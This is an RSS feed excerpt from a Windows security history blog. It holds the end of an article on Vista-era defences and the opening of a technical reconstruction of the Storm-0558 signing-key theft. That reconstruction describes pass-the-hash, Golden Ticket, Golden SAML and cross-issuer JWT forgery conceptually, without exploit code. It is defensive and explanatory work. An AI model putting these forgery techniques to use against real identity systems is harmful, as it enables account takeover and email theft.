No. MS08-067 was patched out-of-band on October 23, 2008 [@s-ms08-067]. Conficker.A was first detected in late November 2008, anchored to November 20, 2008 in SRI International&apos;s technical analysis [@s-sri-conficker-c-addendum]. The first in-the-wild MS08-067 exploitation in October 2008 was Gimmiv.A, a narrower non-self-propagating Trojan, per the NVD CVE-2008-4250 entry -- not Conficker [@s-nvd-cve-2008-4250]. The patch-to-weaponisation gap is approximately twenty-nine days and is the article&apos;s load-bearing thesis evidence.

No. The HTML-comment Mark-of-the-Web (``) shipped in Internet Explorer 6 Service Pack 1 in 2002. The Attachment Execution Service, two years later in XP SP2, is the system-wide enforcement substrate of the `Zone.Identifier` NTFS Alternate Data Stream -- the persistent file-system anchor that downstream tools (Office Protected View, SmartScreen, Microsoft Defender Application Control) consult to gate execution [@s-msft-iattachmentexecute]. Substrate, not ancestor.

No. Russinovich&apos;s June 2007 *TechNet Magazine* article states explicitly that &quot;elevations were introduced as a convenience&quot; and that this very fact &quot;prevents OTS elevations from being a security boundary&quot; [@s-russinovich-uac-technet]. The chronologically first published Microsoft-principal record of the same disclaimer is the February 12, 2007 Mark&apos;s Blog post that anchors the multi-part TechNet blog series on the restricted-token / integrity-level discussion [@s-russinovich-psexec-blog]. The boundary classification arrives with Administrator Protection in the 2024 to 2026 Windows 11 era; see the [Adminless](/blog/adminless-how-windows-finally-made-elevation-a-security-boun/) companion post.

No. Vista&apos;s ASLR was opt-in for user code via the `/DYNAMICBASE` linker flag; only system images and `/DYNAMICBASE`-linked binaries were randomised. Full mandatory ASLR for all images is a later-Windows feature -- Force ASLR in EMET and Windows 8, mandatory in Windows 10. The Shacham et al. CCS 2004 paper had already established the brute-force bound: with $n$ bits of entropy, an attacker needs expected $2^{n-1}$ attempts against a process that respawns after crash [@s-shacham-asrandom-ccs2004]; on x86 Vista&apos;s 8 bits this is roughly 128 attempts, which is why x64 ASLR (qualitatively more entropy) was the more durable defense.

No. BitLocker shipped in Windows Vista Enterprise and Ultimate editions only, plus Windows Server 2008. Most Vista consumers ran Home Basic or Home Premium and got no BitLocker at all. The cipher in Vista was AES-CBC with Niels Ferguson&apos;s Elephant Diffuser, documented in his August 2006 Microsoft whitepaper [@s-ferguson-bitlocker]; later Windows releases moved to AES-XTS. The SKU limitation materially limited deployment reach for the era.

No. KMCS foreclosed the dominant 2003-era unsigned-driver installation path catalogued in Hoglund and Butler [@s-hoglund-butler-rootkits] but did not address the signed-driver-with-vulnerability case. The &quot;Bring Your Own Vulnerable Driver&quot; afterlife became the dominant rootkit-loading path from approximately 2010 onward. Architectural closure waits for the Microsoft Vulnerable Driver Block list (Windows 10 and 11) -- post-era; Part 4 [@s-msft-driver-signing].

Windows ME and Windows 8 have competing claims. The honest framing is that Vista was one of the most poorly received Windows consumer releases of its era, and that the reception was uniquely consequential because the SP1-era enterprise inertia, the consumer-skipping that produced a large XP-to-7 leap, and the marketing problem Windows 7&apos;s launch had to solve all compounded each other. The substantive argument of this article -- that Vista&apos;s architecture was correct and Vista&apos;s integration was not, and that Windows 7 proved the integration tax is payable -- does not depend on the cross-history superlative.
&lt;p&gt;Below the FAQ, a final pointer: this is Part 2 of six. Part 3 picks up the morning after Windows 7 GA with Stuxnet, Operation Aurora, the Enhanced Mitigation Experience Toolkit, and the process-mitigations era. The integrity-level stack Vista shipped in January 2007 is what every Part from here forward is built on top of.&lt;/p&gt;
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;windows-security-wars-part-2&quot; keyTerms={[
  { term: &quot;MS08-067&quot;, definition: &quot;October 23, 2008 out-of-band Microsoft Security Bulletin patching CVE-2008-4250, a stack buffer overflow in the path-canonicalization code reachable through the Server service&apos;s srvsvc RPC interface on TCP/445 and TCP/139.&quot; },
  { term: &quot;UAC (User Account Control)&quot;, definition: &quot;Vista feature that runs interactive Administrator accounts under a filtered standard-user token by default and prompts for explicit consent before releasing the full token to a specific process. Convenience feature per Russinovich, not a security boundary until Administrator Protection (2024-2026).&quot; },
  { term: &quot;MIC (Mandatory Integrity Control)&quot;, definition: &quot;Vista&apos;s mandatory-access-control primitive. Attaches an integrity-level SID to every process token and an integrity-level ACE to every securable object; evaluates integrity before the discretionary ACL in the access check.&quot; },
  { term: &quot;UIPI (User Interface Privilege Isolation)&quot;, definition: &quot;Vista mechanism preventing lower-integrity processes from sending window messages to higher-integrity windows. Closes the shatter-attack class documented by Chris Paget in 2002.&quot; },
  { term: &quot;ASLR (Address Space Layout Randomization)&quot;, definition: &quot;Defense randomising base addresses of executables, libraries, stack, and heap. Vista (Jan 2007) was the first Windows release to ship ASLR; opt-in for user code via /DYNAMICBASE in Vista, mandatory in Windows 10.&quot; },
  { term: &quot;DEP (Data Execution Prevention)&quot;, definition: &quot;Defense refusing to execute instructions from pages marked non-executable. Hardware-enforced using the NX/XD bit; software-enforced via SafeSEH on CPUs without the bit. Shipped in XP SP2 (Aug 2004).&quot; },
  { term: &quot;PatchGuard / KPP (Kernel Patch Protection)&quot;, definition: &quot;Microsoft&apos;s kernel-mode self-protection on x64 Windows. Periodically verifies the integrity of kernel data structures and bug-checks the system on detected modification. Shipped first in April 2005 in XP x64 and Server 2003 x64.&quot; },
  { term: &quot;KMCS (Kernel-Mode Code Signing)&quot;, definition: &quot;Vista x64 policy refusing to load kernel-mode drivers unless they carry a Microsoft-trusted certificate chain. bcdedit /set testsigning on is the documented development escape hatch. Vista x86 never received mandatory KMCS.&quot; },
  { term: &quot;BYOVD (Bring Your Own Vulnerable Driver)&quot;, definition: &quot;Post-KMCS attack pattern using a legitimately signed kernel driver with an exploitable vulnerability to gain ring-0 code execution. Closure waits for the Microsoft Vulnerable Driver Block list, post-era.&quot; },
  { term: &quot;AES + Zone.Identifier ADS&quot;, definition: &quot;XP SP2 Attachment Execution Service plus the NTFS Alternate Data Stream it writes on attachment download. System-wide enforcement substrate of Mark-of-the-Web, not its ancestor.&quot; },
  { term: &quot;WFP (Windows Filtering Platform)&quot;, definition: &quot;Vista&apos;s kernel-mode replacement for the NDIS-IM / TDI / firewall-hook stack-extension architecture. Note: this WFP is unrelated to Windows File Protection.&quot; },
  { term: &quot;WRP (Windows Resource Protection)&quot;, definition: &quot;Vista&apos;s ACL-based replacement for the WFP/SFC catalog-and-replace mechanism. Protected files and registry keys are owned by TrustedInstaller; administrators cannot directly modify them.&quot; },
  { term: &quot;Per-service SID&quot;, definition: &quot;Security identifier of the form NT SERVICE\ distinct to each Windows service. Lets DACLs, firewall rules, and WRITE RESTRICTED tokens constrain a single service independently of others sharing the same logon SID.&quot; },
  { term: &quot;Same-privilege paradox&quot;, definition: &quot;Structural observation that any defense running at a given privilege level cannot fundamentally constrain an attacker at the same level. skape and Skywing demonstrated this against PatchGuard in December 2005.&quot; },
  { term: &quot;Deployment-velocity ceiling&quot;, definition: &quot;Structural upper bound on aggregate installed-base security set by patch-to-field-deployment latency on the slowest cohort. Conficker proved this bound in late November 2008.&quot; }
]} flashcards={[
  { front: &quot;When did Conficker.A first appear?&quot;, back: &quot;November 20, 2008 (SRI International) -- approximately 29 days after MS08-067 was patched.&quot; },
  { front: &quot;Which Windows release first shipped PatchGuard?&quot;, back: &quot;Windows XP Professional x64 Edition and Windows Server 2003 x64 Edition, April 2005. NOT Vista.&quot; },
  { front: &quot;When did Mark-of-the-Web first ship?&quot;, back: &quot;Internet Explorer 6 Service Pack 1, 2002. The XP SP2 Attachment Execution Service is the substrate, not the ancestor.&quot; },
  { front: &quot;What is the integrity-level SID for Medium?&quot;, back: &quot;S-1-16-8192. Medium is the default for normal user processes; the filtered UAC token runs at Medium.&quot; },
  { front: &quot;What did Russinovich call UAC elevations?&quot;, back: &quot;A convenience feature, explicitly NOT a security boundary, per the June 2007 TechNet Magazine article. The boundary classification arrives only with Administrator Protection in the 2024-2026 Windows 11 era.&quot; },
  { front: &quot;When did Vista SP1 RTM?&quot;, back: &quot;February 4, 2008. Broad availability March 18, 2008. (November 2007 was the SP1 RC1 milestone, not RTM.)&quot; },
  { front: &quot;Who authored &apos;Bypassing PatchGuard on Windows x64&apos;?&quot;, back: &quot;skape (Matt Miller) and Skywing (Ken Johnson), Uninformed Vol. 3, dated December 1, 2005.&quot; }
]} questions={[
  { q: &quot;Why is the article&apos;s central claim that &apos;deployment velocity, not discovery latency, is the binding constraint on Internet security&apos;?&quot;, a: &quot;Because MS08-067 had been patched for approximately 29 days when Conficker.A first appeared, and the worm still infected 9 to 15 million machines drawn overwhelmingly from the un-updated XP and Server 2003 cohort. The architectural mitigations in Vista raised exploitation cost on Vista but could not protect machines running older code.&quot; },
  { q: &quot;What is the structural reason PatchGuard was bypassable in 2005, and what is the post-era architectural answer?&quot;, a: &quot;PatchGuard runs at ring 0; rootkits run at ring 0; same-privilege defenses are bypassable in principle. The post-era answer is to move the integrity check into a more privileged execution mode -- HVCI / VBS in Windows 10 (Aug 2016), Pluton and Secured-core PC architectures in Windows 11.&quot; },
  { q: &quot;Distinguish UAC from MIC. Which is the consumer-visible UI and which is the architectural substrate?&quot;, a: &quot;UAC is the consumer-visible UI -- the Secure Desktop consent prompt that releases the full token to a single process. MIC is the architectural substrate -- the integrity-level SID on every process token, the integrity-level ACE on every object, and the access-check pipeline that evaluates integrity before the DAC. Every later Windows containment story inherits MIC.&quot; },
  { q: &quot;Why was Vista&apos;s reception so much worse than Windows 7&apos;s when the security architecture was substantially the same?&quot;, a: &quot;User-hostile integration of a correct architecture is a distinct failure mode from wrong architecture. Vista&apos;s UAC threw too many prompts on common workflows; Windows 7&apos;s auto-elevate whitelist plus the four-level slider tuned the prompt frequency to a tolerable rate. Same architecture, smoothed integration -- and the integration tax was payable when the work was done.&quot; }
]} /&amp;gt;&lt;/p&gt;
</content:encoded><category>windows-security</category><category>history</category><category>vista</category><category>uac</category><category>patchguard</category><category>conficker</category><category>trustworthy-computing</category><category>aslr</category><category>The Windows Security Wars</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>Forged from 2016: How Storm-0558 Turned One Stolen Signing Key into U.S. Government Email Access</title><link>https://paragmali.com/blog/forged-from-2016-how-storm-0558-turned-one-stolen-signing-ke/</link><guid isPermaLink="true">https://paragmali.com/blog/forged-from-2016-how-storm-0558-turned-one-stolen-signing-ke/</guid><description>A 2016 consumer Microsoft signing key, never rotated, forged tokens that read U.S. government email for six weeks before a paying customer noticed. A technical reconstruction.</description><pubDate>Thu, 28 May 2026 00:00:00 GMT</pubDate><content:encoded>
**In summer 2023, a stolen Microsoft consumer signing key from 2016 was used to forge cryptographically valid tokens that read the email of U.S. Commerce Secretary Gina Raimondo, U.S. Ambassador to China Nicholas Burns, Congressman Don Bacon (R-NE), and approximately 60,000 messages from State Department accounts.** The cloud provider did not detect the breach -- the State Department did, on June 15, 2023, by spotting an unfamiliar `ClientAppID` in Microsoft 365 Purview audit logs. Three years on, Microsoft cannot publicly explain how the key was stolen. The Cyber Safety Review Board called the intrusion &quot;preventable&quot; and Microsoft&apos;s security culture &quot;inadequate&quot;; Microsoft&apos;s Secure Future Initiative now custodies signing keys in hardware security modules and Azure Confidential VMs and validates 90% of Entra ID tokens for Microsoft apps with a hardened SDK -- a four-for-four mapping to the four ways the pre-incident architecture failed at once.
&lt;h2&gt;1. A 2016 Key That Forged 2023 Government Email&lt;/h2&gt;
&lt;p&gt;On June 15, 2023, an analyst at the U.S. State Department&apos;s Security Operations Center was sifting through &lt;code&gt;MailItemsAccessed&lt;/code&gt; events in Microsoft 365 Purview audit logs when something did not fit. A &lt;code&gt;ClientAppID&lt;/code&gt; was reading mailboxes that did not match any application the State Department ran. The tokens that ClientAppID had presented to Exchange Online were cryptographically valid. They had been signed by a key Microsoft itself had published. Just not in 2023.&lt;/p&gt;
&lt;p&gt;The certificate for that key was issued April 5, 2016. It had expired April 4, 2021 [@wiz-storm0558]. And per Microsoft&apos;s own admission to the Cyber Safety Review Board nine months later, nobody at Microsoft can publicly tell you how Storm-0558 got hold of it [@csrb-report-2024; @msrc-key-acquisition].&lt;/p&gt;
&lt;p&gt;The State Department notified Microsoft on June 16, 2023 [@csrb-report-2024]. The Cybersecurity and Infrastructure Security Agency was looped in within days. On July 11, 2023, Microsoft published its first public mitigation post, attributing the campaign to a China-based actor it called Storm-0558 and reporting that approximately 25 organizations were affected [@msrc-storm0558-jul11]. Three days later, the Microsoft Threat Intelligence team published a longer technical analysis confirming the same actor had used &quot;forged authentication tokens&quot; beginning May 15, 2023 [@ms-security-jul14].&lt;/p&gt;

The Board finds that this intrusion was preventable and should never have occurred. The Board also concludes that Microsoft&apos;s security culture was inadequate and requires an overhaul. -- Cyber Safety Review Board, April 2, 2024 [@csrb-report-2024]
&lt;p&gt;The plain English of what happened is this. Storm-0558 had stolen one private signing key. By the construction of Microsoft&apos;s identity infrastructure, that key was authoritative for the consumer-grade Microsoft Account (MSA) issuer -- the same issuer that signs tokens for &lt;code&gt;@outlook.com&lt;/code&gt;, &lt;code&gt;@live.com&lt;/code&gt;, Xbox accounts, and personal applications. The actor used the key to mint OpenID Connect access tokens that named enterprise mailboxes as their target. Those tokens should not have been accepted by Exchange Online, because Exchange Online is an enterprise resource and the signing key was a consumer issuer&apos;s. But they were accepted.&lt;/p&gt;
&lt;p&gt;Once accepted, they granted read access to the named mailboxes. For six weeks, that access was active and uninterrupted. The Cyber Safety Review Board&apos;s final tally puts the harvest at approximately 60,000 emails from State Department accounts and a total of 22 enterprise organizations along with approximately 503 related personal accounts [@csrb-report-2024]. Identified individual victims include U.S. Commerce Secretary Gina Raimondo, U.S. Ambassador to China Nicholas Burns, and U.S. House of Representatives accounts that publicly include Congressman Don Bacon (R-NE) [@csrb-report-2024].&lt;/p&gt;

A class of attacks in which an adversary obtains an identity authority&apos;s private signing key and uses it to mint cryptographically valid credentials (tokens, tickets, or assertions) that no downstream defender can distinguish from those issued by the legitimate authority. MITRE catalogs the technique family as T1606, &quot;Forge Web Credentials,&quot; with sub-techniques for web cookies (T1606.001) and SAML tokens (T1606.002) [@mitre-t1606; @mitre-t1606-002].
&lt;p&gt;Four facts about this incident are what make it architecturally important, and each is a separate failure with its own remediation path. The first is that the stolen key was seven years old. It was issued in 2016 and had not been rotated since [@csrb-report-2024]. The second is that the validator on the enterprise side accepted a token signed by the wrong issuer for an enterprise resource. The third is that the cloud provider did not detect the breach -- a paying customer did, on routine threat-hunting against an audit log the customer had to pay extra to collect. The fourth, perhaps most uncomfortable, is that the cloud provider does not know how its own root signing secret was stolen.&lt;/p&gt;
&lt;p&gt;Microsoft published a hypothesis in September 2023 (a crash dump exfiltrated through a compromised engineering account) [@msrc-key-acquisition], partially walked it back in March 2024 (&quot;we have not found a crash dump containing the impacted key material&quot;) [@msrc-key-acquisition], and three weeks later the CSRB concluded definitively: Microsoft &quot;has been unable to determine how or when Storm-0558 obtained the MSA key&quot; [@csrb-report-2024].&lt;/p&gt;
&lt;p&gt;The &quot;Storm-0558&quot; name is Microsoft&apos;s. Microsoft adopted a weather-themed taxonomy on April 18, 2023, in which &lt;code&gt;Storm-NNNN&lt;/code&gt; denotes a developing actor pending attribution and family names like &quot;Typhoon&quot; indicate origin -- in this case, China [@ms-learn-actor-naming]. After attribution work matured, Microsoft renamed the group &quot;Antique Typhoon&quot; in August 2024 [@ms-security-jul14].&lt;/p&gt;
&lt;p&gt;Each of those four facts is the closure of a separate architectural failure, and each is fixable in isolation. So how did all four fail at once? That answer begins with where the attack class came from, and why it had been written about for six years before it caught the State Department&apos;s attention.&lt;/p&gt;
&lt;h2&gt;2. The Lineage of Signing-Key Forgery&lt;/h2&gt;
&lt;p&gt;Storm-0558 is not a novel attack class. The primitive it instantiates -- steal an identity authority&apos;s signing secret, mint cryptographically valid tokens that no downstream defense can distinguish from legitimate ones -- has a six-year published lineage and an even longer informal one. The most important word in the previous sentence is &quot;lineage.&quot; Each generation widened the &lt;em&gt;trust domain&lt;/em&gt; the forgery primitive defeats.&lt;/p&gt;
&lt;p&gt;Storm-0558 is the cloud-provider generalization of a technique whose first formal name dates to November 2017, when Shaked Reiner of CyberArk Labs published a CyberArk Threat Research post titled &lt;em&gt;Golden SAML: Newly Discovered Attack Technique Forges Authentication to Cloud Apps&lt;/em&gt; [@reiner-golden-saml]. Reiner named the technique deliberately, riffing on Benjamin Delpy&apos;s earlier &quot;Golden Ticket&quot; name for the Kerberos analog.&lt;/p&gt;
&lt;p&gt;Walking the lineage forward in order from oldest primitive to Storm-0558 is the cleanest way to see what is genuinely new in 2023.&lt;/p&gt;

timeline
    title Lineage of Identity-Authority Forgery
    1997 : Pass-the-Hash : User credential reuse, host scope
    2014 : Golden Ticket (Mimikatz) : krbtgt theft, AD forest scope
    2017 : Golden SAML (Reiner / CyberArk) : AD FS Token-Signing key, federation scope
    2020 : Sunburst SAML token forgery : Customer federations via supply chain
    2023 : Storm-0558 : Cloud provider&apos;s own MSA signing key
&lt;p&gt;Generation one is &lt;strong&gt;&lt;a href=&quot;https://paragmali.com/blog/who-is-allowed-to-log-in-where-the-kdc-side-answer-to-creden/&quot; rel=&quot;noopener&quot;&gt;Pass-the-Hash&lt;/a&gt;&lt;/strong&gt;, first published as working exploit code by Paul Ashton on NTBugtraq in April 1997 (a modified Samba SMB client whose &lt;code&gt;orig_client.c&lt;/code&gt; diff is dated &lt;code&gt;Tue Apr 8 17:27:29 1997&lt;/code&gt;) [@ashton-pth-1997] and described in Microsoft&apos;s own canonical whitepaper as the user-level baseline that all later generations replaced [@ms-pth-paper; @mitre-t1550-002]. The attacker captures the NTLM hash from a host they have already compromised and re-presents it to other Windows hosts. No password is recovered, no signing infrastructure is touched.The CIFS/SMB authentication exchange that PtH abuses passes the NTLM hash as a &lt;em&gt;cryptographic proof of knowledge&lt;/em&gt; without ever needing the plaintext password -- which is why hashing the password did not reduce the attacker&apos;s working set. The blast radius is a single Windows host or, when paired with lateral movement, a constellation of hosts that share a credential. The trust authority being attacked is the user account, and the prerequisite is local code execution.&lt;/p&gt;
&lt;p&gt;Generation two is &lt;strong&gt;&lt;a href=&quot;https://paragmali.com/blog/krbtgt-the-account-that-owns-active-directory/&quot; rel=&quot;noopener&quot;&gt;Golden Ticket&lt;/a&gt;&lt;/strong&gt;, attributed to Benjamin Delpy&apos;s mimikatz tool from approximately 2014 [@mitre-t1558-001; @mimikatz-kerberos; @crowdstrike-golden-ticket]. Where Pass-the-Hash forges &lt;em&gt;user&lt;/em&gt; credentials, Golden Ticket forges &lt;em&gt;Kerberos Ticket-Granting Tickets&lt;/em&gt; by signing them with the stolen &lt;code&gt;krbtgt&lt;/code&gt; account&apos;s password hash from a domain controller. A forged TGT carries arbitrary &lt;code&gt;PrivAttrCert&lt;/code&gt; SIDs, so the attacker can claim membership in any AD group, including Domain Admins. The blast radius widens from a host to an entire Active Directory forest. The trust authority being attacked is the forest&apos;s Key Distribution Center, and the prerequisite is extracting the &lt;code&gt;krbtgt&lt;/code&gt; hash from a domain controller -- a one-time theft that, until &lt;code&gt;krbtgt&lt;/code&gt; is rotated, lets the attacker mint TGTs indefinitely.&lt;/p&gt;
&lt;p&gt;Generation three is &lt;strong&gt;Golden SAML&lt;/strong&gt;, the technique Reiner named in 2017 [@reiner-golden-saml]. The vector is the same shape: steal the AD FS Token-Signing private key, forge SAML assertions, present them to any cloud Service Provider federated to that AD FS. Quoting Reiner verbatim, the technique &quot;enables an attacker to create a golden SAML, which is basically a forged SAML &apos;authentication object,&apos; and authenticate across every service that uses SAML 2.0 protocol as an SSO mechanism.&quot; The blast radius widens again: from a single forest to every cloud Service Provider configured to trust that customer&apos;s AD FS -- Azure, AWS, vSphere, and any SaaS in the customer&apos;s SSO catalog. CyberArk published a proof-of-concept tool, &lt;code&gt;shimit&lt;/code&gt;, the same year [@shimit].&lt;/p&gt;
&lt;p&gt;The naming lineage is deliberate. Delpy&apos;s &quot;Golden Ticket&quot; was an explicit reference to the visual of unlimited, never-expiring access; Reiner&apos;s &quot;Golden SAML&quot; was equally explicit homage to Delpy. Reiner notes the connection openly in the original CyberArk post: &quot;the golden SAML name may remind you of another notorious attack known as golden ticket, which was introduced by Benjamin Delpy who is known for his famous attack tool called Mimikatz&quot; [@reiner-golden-saml]. Storm-0558 is the unnamed fifth generation.&lt;/p&gt;
&lt;p&gt;Generation four is &lt;strong&gt;Sunburst&lt;/strong&gt;, December 2020. The Russian Foreign Intelligence Service (SVR) compromised the &lt;a href=&quot;https://paragmali.com/blog/the-thirteen-months-that-made-zero-trust-unavoidable-the-win/&quot; rel=&quot;noopener&quot;&gt;SolarWinds Orion build pipeline&lt;/a&gt;, planted a backdoor in Orion updates, and from that initial-access foothold used Golden SAML against the federations of victim organizations to mint forged SAML tokens for Microsoft 365 and other federated SaaS [@aa20-352a; @cyberark-golden-saml-revisited]. Microsoft itself was among the victims. The company&apos;s February 2021 final update acknowledged that SVR had accessed source code for &quot;small subsets&quot; of Azure, Intune, and Exchange components but found &quot;no evidence of access to production services or customer data,&quot; and reported that the actor was not able to gain access to privileged credentials or apply the SAML forgery techniques against Microsoft&apos;s own corporate domains [@msrc-solorigate-final].&lt;/p&gt;
&lt;p&gt;The blast radius pattern of Sunburst was: one supply-chain compromise on the way in, then Golden SAML in each federation once inside. CISA attributed the SAML-token forgery technique explicitly in AA20-352A and named the SVR as the responsible actor in an April 2021 update to the advisory [@aa20-352a].&lt;/p&gt;

A 2017 attack technique by which an adversary who possesses the AD FS Token-Signing private key forges SAML 2.0 assertions and authenticates as any user to any cloud Service Provider that federates with that AD FS. Cataloged by MITRE as T1606.002 (&quot;Forge Web Credentials: SAML Tokens&quot;) and named by Shaked Reiner of CyberArk Labs in deliberate homage to Mimikatz&apos;s &quot;Golden Ticket&quot; [@mitre-t1606-002; @reiner-golden-saml].
&lt;p&gt;Generation five -- the one this article is about -- is &lt;strong&gt;Storm-0558&lt;/strong&gt;. The earlier four generations had one structural property in common: the trust authority being forged was the &lt;em&gt;customer&apos;s&lt;/em&gt; identity infrastructure. The customer&apos;s NT account database, the customer&apos;s domain controller, the customer&apos;s AD FS Token-Signing certificate, the customer&apos;s Orion-installed SolarWinds environment that fed those things. Sunburst, when it reached Microsoft, attacked Microsoft as a customer of its own corporate AD FS infrastructure. Storm-0558 attacked something different: the &lt;em&gt;cloud provider&apos;s own&lt;/em&gt; consumer identity-provider signing key. The trust authority being forged was Microsoft&apos;s MSA issuer -- the consumer-tier signing infrastructure that Microsoft itself operates as a service.&lt;/p&gt;
&lt;p&gt;The blast radius of an attack of this shape is bounded only by where the relying-party validation libraries accept the cloud provider&apos;s issuer. In Storm-0558&apos;s case, as Wiz Research showed in independent analysis, the key could in principle have signed tokens accepted by Outlook.com, SharePoint, Teams, OneDrive, and any third-party multi-tenant application using Microsoft&apos;s converged v2.0 endpoint that accepts &quot;Sign in with Microsoft&quot; for personal accounts [@wiz-storm0558]. The publicly documented exploitation was scoped to Exchange Online and Outlook Web Access, but, as Wiz&apos;s authors put it, &quot;the compromised signing key was more powerful than it may have seemed&quot; [@wiz-storm0558].&lt;/p&gt;
&lt;p&gt;So Storm-0558 is generation five in a chain whose earlier four generations had been documented, named, simulated, and operationalized for the better part of a decade. Sunburst still required compromising one customer&apos;s federation at a time. Storm-0558 compromised something different: Microsoft&apos;s own consumer identity provider. To understand how a &lt;em&gt;consumer&lt;/em&gt; signing key could authenticate against an &lt;em&gt;enterprise&lt;/em&gt; mailbox, we have to look at three architectural decisions Microsoft made between 2016 and 2022 -- and how they layered on top of an unrotated 2016 key.&lt;/p&gt;
&lt;h2&gt;3. The Architecture Before Storm-0558&lt;/h2&gt;
&lt;p&gt;Two parallel Microsoft identity providers operate under one corporate roof. The first is the consumer &lt;strong&gt;Microsoft Account (MSA) issuer&lt;/strong&gt;, which signs tokens for &lt;code&gt;@outlook.com&lt;/code&gt;, &lt;code&gt;@live.com&lt;/code&gt;, Xbox accounts, and the personal-account flavor of &quot;Sign in with Microsoft.&quot; The second is the enterprise &lt;strong&gt;Microsoft Entra ID issuer&lt;/strong&gt; (formerly Azure AD), which signs tokens for &lt;code&gt;@contoso.com&lt;/code&gt;-style workforce identities under a per-tenant issuer URL. Each issuer has its own signing keys and its own JWKS endpoint -- the public-key distribution endpoint that relying parties fetch to validate signatures.&lt;/p&gt;
&lt;p&gt;These are separate systems with separate signing infrastructure, but the cross-tier distinction is finer than &quot;different domains.&quot; Both the MSA and Entra ID issuers publish their v2.0 OpenID Connect tokens under the same &lt;code&gt;login.microsoftonline.com&lt;/code&gt; host. What distinguishes them is the tenant GUID inside the issuer URL. The MSA &quot;consumers&quot; tenant has the well-known GUID &lt;code&gt;9188040d-6c67-4c5b-b112-36a304b66dad&lt;/code&gt;, so its v2.0 OIDC issuer is &lt;code&gt;https://login.microsoftonline.com/9188040d-6c67-4c5b-b112-36a304b66dad/v2.0&lt;/code&gt; (verifiable live from the MSA OpenID Connect discovery document) [@msa-oidc-discovery]. Every Entra ID enterprise tenant has its own tenant GUID, so its issuer is &lt;code&gt;https://login.microsoftonline.com/{enterprise-tenant-GUID}/v2.0&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Microsoft&apos;s own July 11, 2023 disclosure put it plainly: &quot;MSA (consumer) keys and Azure AD (enterprise) keys are issued and managed from separate systems and should only be valid for their respective systems. The actor exploited a token validation issue to impersonate Azure AD users and gain access to enterprise mail&quot; [@msrc-storm0558-jul11]. The architectural sentence to hold on to from that paragraph is &lt;em&gt;should only be valid for their respective systems&lt;/em&gt;. The next 1,500 words are an explanation of how that &quot;should&quot; became &quot;did not.&quot;&lt;/p&gt;

A compact, URL-safe token format consisting of three Base64URL-encoded parts: a header (algorithm and key identifier), a payload (claims like `iss` (issuer), `sub` (subject), `aud` (audience), `exp` (expiration), `nbf` (not-before), and application-specific claims), and a signature over the header and payload. JSON Web Token Best Current Practices are codified in IETF RFC 8725 [@rfc-8725].

JWKS is the *JSON Web Key Set* a token issuer publishes at a well-known URL. Each key in the set carries a `kid` (Key ID). The JWT header names a `kid`, and the relying party uses it to locate the matching public key from the issuer&apos;s JWKS for signature verification. RFC 8725 requires a validator to restrict which signing algorithms it will accept (Section 3.1) and binds the `kid` lookup to a specific issuer&apos;s keys, never to a global key namespace [@rfc-8725].
&lt;p&gt;To understand the cross-tier flaw, walk a standard JWT validation flow in order. Step one: the relying party parses the JWT header to read the &lt;code&gt;alg&lt;/code&gt; and &lt;code&gt;kid&lt;/code&gt;. Step two: it looks up the issuer&apos;s JWKS using the &lt;code&gt;iss&lt;/code&gt; claim from the payload (or a hard-coded issuer URL it trusts). Step three: it locates the public key whose &lt;code&gt;kid&lt;/code&gt; matches the one in the header. Step four: it verifies the signature using that key.&lt;/p&gt;
&lt;p&gt;Step five is the one that matters. The validator checks the payload claims: &lt;code&gt;iss&lt;/code&gt; must match the trusted issuer for this resource, &lt;code&gt;aud&lt;/code&gt; must match this resource&apos;s identifier, &lt;code&gt;exp&lt;/code&gt; and &lt;code&gt;nbf&lt;/code&gt; must bracket the current time, and any application-specific tenant or scope claims must be enforced [@rfc-8725]. RFC 8725 (the IETF JWT Best Current Practices, published February 2020) makes step five mandatory; its Section 3.8 requires that &quot;the application MUST validate that the cryptographic keys used for the cryptographic operations in the JWT belong to the issuer. If they do not, the application MUST reject the JWT.&quot; When step five does not happen, the entire validation reduces to &quot;the signature is valid for &lt;em&gt;some&lt;/em&gt; key the issuer signed &lt;em&gt;something&lt;/em&gt; with,&quot; which is not the same as &quot;the token authorizes the bearer for this resource.&quot;&lt;/p&gt;

flowchart LR
    A[&quot;JWT arrives at relying party&quot;] --&amp;gt; B[&quot;Parse header: alg, kid&quot;]
    B --&amp;gt; C[&quot;Fetch issuer JWKS by iss claim&quot;]
    C --&amp;gt; D[&quot;Find key by kid&quot;]
    D --&amp;gt; E[&quot;Verify signature with public key&quot;]
    E --&amp;gt; F[&quot;Check iss, aud, tenant, scope, exp, nbf&quot;]
    F --&amp;gt; G[&quot;Allow request&quot;]
    F -.-&amp;gt;|&quot;omitted in OWA path before 2023&quot;| G

Microsoft Account is the consumer identity provider for `@outlook.com`, `@live.com`, Xbox, and personal-account &quot;Sign in with Microsoft&quot; flows. Its v2.0 OpenID Connect issuer is `https://login.microsoftonline.com/9188040d-6c67-4c5b-b112-36a304b66dad/v2.0` -- the MSA &quot;consumers&quot; tenant on the shared `login.microsoftonline.com` host [@msa-oidc-discovery].&lt;p&gt;Microsoft Entra ID (formerly Azure Active Directory) is the enterprise identity provider for tenant-scoped workforce identities like &lt;code&gt;user@contoso.com&lt;/code&gt;, with per-tenant issuers of the form &lt;code&gt;https://login.microsoftonline.com/{enterprise-tenant-GUID}/v2.0&lt;/code&gt; on the same host. The cross-tier distinction is therefore tenant-GUID-vs-tenant-GUID inside the same v2.0 URL template, not domain-vs-domain. The two systems are operationally separate with separate signing keys, separate JWKS endpoints, and separate intended audiences [@msrc-storm0558-jul11; @msa-oidc-discovery].
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;
&lt;p&gt;Now bring in the three architectural decisions that lined up to create Storm-0558&apos;s window.&lt;/p&gt;
&lt;p&gt;The &lt;strong&gt;first decision&lt;/strong&gt;, in September 2018, was that Microsoft published a converged metadata endpoint. Microsoft&apos;s own September 6, 2023 retrospective is explicit about the motivation: &quot;To meet growing customer demand to support applications which work with both consumer and enterprise applications, Microsoft introduced a common key metadata publishing endpoint in September 2018&quot; [@msrc-key-acquisition].&lt;/p&gt;
&lt;p&gt;The point of the converged endpoint was developer ergonomics. Build one app, use one validation library, accept users from &lt;code&gt;@outlook.com&lt;/code&gt; and &lt;code&gt;@contoso.com&lt;/code&gt; alike. Internally, the shared validation library would verify signatures against either issuer&apos;s keys, and was documented to expect that callers would add their own issuer and scope checks for resource-side authorization decisions.&lt;/p&gt;
